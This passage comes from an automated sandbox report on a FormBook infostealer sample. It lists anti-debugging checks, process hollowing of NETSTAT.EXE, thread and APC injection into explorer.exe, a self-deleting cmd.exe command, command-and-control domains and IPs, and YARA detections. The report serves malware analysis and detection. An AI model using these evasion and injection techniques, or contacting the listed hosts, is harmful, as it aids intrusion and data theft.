          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01361608 mov eax, dword ptr fs:[00000030h]4_2_01361608
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B766D mov eax, dword ptr fs:[00000030h]4_2_012B766D
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CAE73 mov eax, dword ptr fs:[00000030h]4_2_012CAE73
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CAE73 mov eax, dword ptr fs:[00000030h]4_2_012CAE73
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CAE73 mov eax, dword ptr fs:[00000030h]4_2_012CAE73
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CAE73 mov eax, dword ptr fs:[00000030h]4_2_012CAE73
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CAE73 mov eax, dword ptr fs:[00000030h]4_2_012CAE73
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B7E41 mov eax, dword ptr fs:[00000030h]4_2_012B7E41
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B7E41 mov eax, dword ptr fs:[00000030h]4_2_012B7E41
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B7E41 mov eax, dword ptr fs:[00000030h]4_2_012B7E41
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B7E41 mov eax, dword ptr fs:[00000030h]4_2_012B7E41
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B7E41 mov eax, dword ptr fs:[00000030h]4_2_012B7E41
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B7E41 mov eax, dword ptr fs:[00000030h]4_2_012B7E41
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0136AE44 mov eax, dword ptr fs:[00000030h]4_2_0136AE44
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0136AE44 mov eax, dword ptr fs:[00000030h]4_2_0136AE44
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01370EA5 mov eax, dword ptr fs:[00000030h]4_2_01370EA5
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01370EA5 mov eax, dword ptr fs:[00000030h]4_2_01370EA5
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01370EA5 mov eax, dword ptr fs:[00000030h]4_2_01370EA5
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013246A7 mov eax, dword ptr fs:[00000030h]4_2_013246A7
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0133FE87 mov eax, dword ptr fs:[00000030h]4_2_0133FE87
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B76E2 mov eax, dword ptr fs:[00000030h]4_2_012B76E2
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D16E0 mov ecx, dword ptr fs:[00000030h]4_2_012D16E0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01378ED6 mov eax, dword ptr fs:[00000030h]4_2_01378ED6
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D36CC mov eax, dword ptr fs:[00000030h]4_2_012D36CC
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E8EC7 mov eax, dword ptr fs:[00000030h]4_2_012E8EC7
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0135FEC0 mov eax, dword ptr fs:[00000030h]4_2_0135FEC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C82ACB mov eax, dword ptr fs:[00000030h]15_2_02C82ACB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C82AE4 mov eax, dword ptr fs:[00000030h]15_2_02C82AE4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D14AEF mov eax, dword ptr fs:[00000030h]15_2_02D14AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D14AEF mov eax, dword ptr fs:[00000030h]15_2_02D14AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D14AEF mov eax, dword ptr fs:[00000030h]15_2_02D14AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D14AEF mov eax, dword ptr fs:[00000030h]15_2_02D14AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D14AEF mov eax, dword ptr fs:[00000030h]15_2_02D14AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D14AEF mov eax, dword ptr fs:[00000030h]15_2_02D14AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D14AEF mov eax, dword ptr fs:[00000030h]15_2_02D14AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D14AEF mov eax, dword ptr fs:[00000030h]15_2_02D14AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D14AEF mov eax, dword ptr fs:[00000030h]15_2_02D14AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D14AEF mov eax, dword ptr fs:[00000030h]15_2_02D14AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D14AEF mov eax, dword ptr fs:[00000030h]15_2_02D14AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D14AEF mov eax, dword ptr fs:[00000030h]15_2_02D14AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D14AEF mov eax, dword ptr fs:[00000030h]15_2_02D14AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D14AEF mov eax, dword ptr fs:[00000030h]15_2_02D14AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C8D294 mov eax, dword ptr fs:[00000030h]15_2_02C8D294
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C8D294 mov eax, dword ptr fs:[00000030h]15_2_02C8D294
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C552A5 mov eax, dword ptr fs:[00000030h]15_2_02C552A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C552A5 mov eax, dword ptr fs:[00000030h]15_2_02C552A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C552A5 mov eax, dword ptr fs:[00000030h]15_2_02C552A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C552A5 mov eax, dword ptr fs:[00000030h]15_2_02C552A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C552A5 mov eax, dword ptr fs:[00000030h]15_2_02C552A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C6AAB0 mov eax, dword ptr fs:[00000030h]15_2_02C6AAB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C6AAB0 mov eax, dword ptr fs:[00000030h]15_2_02C6AAB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C8FAB0 mov eax, dword ptr fs:[00000030h]15_2_02C8FAB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D1EA55 mov eax, dword ptr fs:[00000030h]15_2_02D1EA55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C59240 mov eax, dword ptr fs:[00000030h]15_2_02C59240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C59240 mov eax, dword ptr fs:[00000030h]15_2_02C59240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C59240 mov eax, dword ptr fs:[00000030h]15_2_02C59240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C59240 mov eax, dword ptr fs:[00000030h]15_2_02C59240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02CE4257 mov eax, dword ptr fs:[00000030h]15_2_02CE4257
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D0B260 mov eax, dword ptr fs:[00000030h]15_2_02D0B260
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D0B260 mov eax, dword ptr fs:[00000030h]15_2_02D0B260
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D28A62 mov eax, dword ptr fs:[00000030h]15_2_02D28A62
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C9927A mov eax, dword ptr fs:[00000030h]15_2_02C9927A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D1AA16 mov eax, dword ptr fs:[00000030h]15_2_02D1AA16
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D1AA16 mov eax, dword ptr fs:[00000030h]15_2_02D1AA16
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C68A0A mov eax, dword ptr fs:[00000030h]15_2_02C68A0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C5AA16 mov eax, dword ptr fs:[00000030h]15_2_02C5AA16
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C5AA16 mov eax, dword ptr fs:[00000030h]15_2_02C5AA16
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C55210 mov eax, dword ptr fs:[00000030h]15_2_02C55210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C55210 mov ecx, dword ptr fs:[00000030h]15_2_02C55210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C55210 mov eax, dword ptr fs:[00000030h]15_2_02C55210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C55210 mov eax, dword ptr fs:[00000030h]15_2_02C55210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C73A1C mov eax, dword ptr fs:[00000030h]15_2_02C73A1C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C94A2C mov eax, dword ptr fs:[00000030h]15_2_02C94A2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C94A2C mov eax, dword ptr fs:[00000030h]15_2_02C94A2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A229 mov eax, dword ptr fs:[00000030h]15_2_02C7A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A229 mov eax, dword ptr fs:[00000030h]15_2_02C7A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A229 mov eax, dword ptr fs:[00000030h]15_2_02C7A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A229 mov eax, dword ptr fs:[00000030h]15_2_02C7A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A229 mov eax, dword ptr fs:[00000030h]15_2_02C7A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A229 mov eax, dword ptr fs:[00000030h]15_2_02C7A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A229 mov eax, dword ptr fs:[00000030h]15_2_02C7A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A229 mov eax, dword ptr fs:[00000030h]15_2_02C7A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A229 mov eax, dword ptr fs:[00000030h]15_2_02C7A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02CD53CA mov eax, dword ptr fs:[00000030h]15_2_02CD53CA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02CD53CA mov eax, dword ptr fs:[00000030h]15_2_02CD53CA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C803E2 mov eax, dword ptr fs:[00000030h]15_2_02C803E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C803E2 mov eax, dword ptr fs:[00000030h]15_2_02C803E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C803E2 mov eax, dword ptr fs:[00000030h]15_2_02C803E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C803E2 mov eax, dword ptr fs:[00000030h]15_2_02C803E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C803E2 mov eax, dword ptr fs:[00000030h]15_2_02C803E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C803E2 mov eax, dword ptr fs:[00000030h]15_2_02C803E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7DBE9 mov eax, dword ptr fs:[00000030h]15_2_02C7DBE9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D023E3 mov ecx, dword ptr fs:[00000030h]15_2_02D023E3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D023E3 mov ecx, dword ptr fs:[00000030h]15_2_02D023E3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D023E3 mov eax, dword ptr fs:[00000030h]15_2_02D023E3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C61B8F mov eax, dword ptr fs:[00000030h]15_2_02C61B8F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C61B8F mov eax, dword ptr fs:[00000030h]15_2_02C61B8F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D0D380 mov ecx, dword ptr fs:[00000030h]15_2_02D0D380
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C8B390 mov eax, dword ptr fs:[00000030h]15_2_02C8B390
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D1138A mov eax, dword ptr fs:[00000030h]15_2_02D1138A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C82397 mov eax, dword ptr fs:[00000030h]15_2_02C82397
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C84BAD mov eax, dword ptr fs:[00000030h]15_2_02C84BAD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C84BAD mov eax, dword ptr fs:[00000030h]15_2_02C84BAD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C84BAD mov eax, dword ptr fs:[00000030h]15_2_02C84BAD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D25BA5 mov eax, dword ptr fs:[00000030h]15_2_02D25BA5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C5DB40 mov eax, dword ptr fs:[00000030h]15_2_02C5DB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D28B58 mov eax, dword ptr fs:[00000030h]15_2_02D28B58
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C5F358 mov eax, dword ptr fs:[00000030h]15_2_02C5F358
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C5DB60 mov ecx, dword ptr fs:[00000030h]15_2_02C5DB60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C83B7A mov eax, dword ptr fs:[00000030h]15_2_02C83B7A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C83B7A mov eax, dword ptr fs:[00000030h]15_2_02C83B7A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D1131B mov eax, dword ptr fs:[00000030h]15_2_02D1131B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A309 mov eax, dword ptr fs:[00000030h]15_2_02C7A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A309 mov eax, dword ptr fs:[00000030h]15_2_02C7A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A309 mov eax, dword ptr fs:[00000030h]15_2_02C7A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A309 mov eax, dword ptr fs:[00000030h]15_2_02C7A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A309 mov eax, dword ptr fs:[00000030h]15_2_02C7A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A309 mov eax, dword ptr fs:[00000030h]15_2_02C7A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A309 mov eax, dword ptr fs:[00000030h]15_2_02C7A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A309 mov eax, dword ptr fs:[00000030h]15_2_02C7A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A309 mov eax, dword ptr fs:[00000030h]15_2_02C7A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A309 mov eax, dword ptr fs:[00000030h]15_2_02C7A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A309 mov eax, dword ptr fs:[00000030h]15_2_02C7A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A309 mov eax, dword ptr fs:[00000030h]15_2_02C7A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A309 mov eax, dword ptr fs:[00000030h]15_2_02C7A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A309 mov eax, dword ptr fs:[00000030h]15_2_02C7A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A309 mov eax, dword ptr fs:[00000030h]15_2_02C7A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A309 mov eax, dword ptr fs:[00000030h]15_2_02C7A309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_00409B40 LdrLoadDll,4_2_00409B40

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.60.208 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.sarahkramirez.store
          Source: C:\Windows\explorer.exeDomain query: www.taeksanglee.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.225.32.156 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.stxgvdhndry.mobi
          Source: C:\Windows\explorer.exeDomain query: www.malmaten.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 99.83.248.72 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.03gjm.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 203.170.80.250 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.supertry.online
          Source: C:\Windows\explorer.exeDomain query: www.ohhhmarketing.com
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: A80000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeMemory written: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeThread register set: target process: 3968Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeThread register set: target process: 3968Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 3968Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeProcess created: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqjJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe"Jump to behavior
          Source: explorer.exe, 00000006.00000000.291136563.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.273163507.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.259148017.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanEXE^
          Source: explorer.exe, 00000006.00000000.285004794.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.324335948.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.299316370.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.273354808.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.320890357.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.259419306.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.273354808.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.320890357.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.259419306.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000000.320686942.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.291147750.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.259167913.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd4
          Source: explorer.exe, 00000006.00000000.273354808.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.320890357.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.259419306.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
          Source: C:\Users\user\Desktop\4505682666.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.0.sfxwkrzgst.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.sfxwkrzgst.exe.2730000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.sfxwkrzgst.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.sfxwkrzgst.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.sfxwkrzgst.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.sfxwkrzgst.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.sfxwkrzgst.exe.2730000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.sfxwkrzgst.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.sfxwkrzgst.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.253680053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.335402219.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.512366000.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.252192070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.284289217.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.256509759.0000000002730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.298993321.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.335351596.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.0.sfxwkrzgst.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.sfxwkrzgst.exe.2730000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.sfxwkrzgst.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.sfxwkrzgst.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.sfxwkrzgst.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.sfxwkrzgst.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.sfxwkrzgst.exe.2730000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.sfxwkrzgst.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.sfxwkrzgst.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.253680053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.335402219.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.512366000.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.252192070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.284289217.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.256509759.0000000002730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.298993321.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.335351596.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

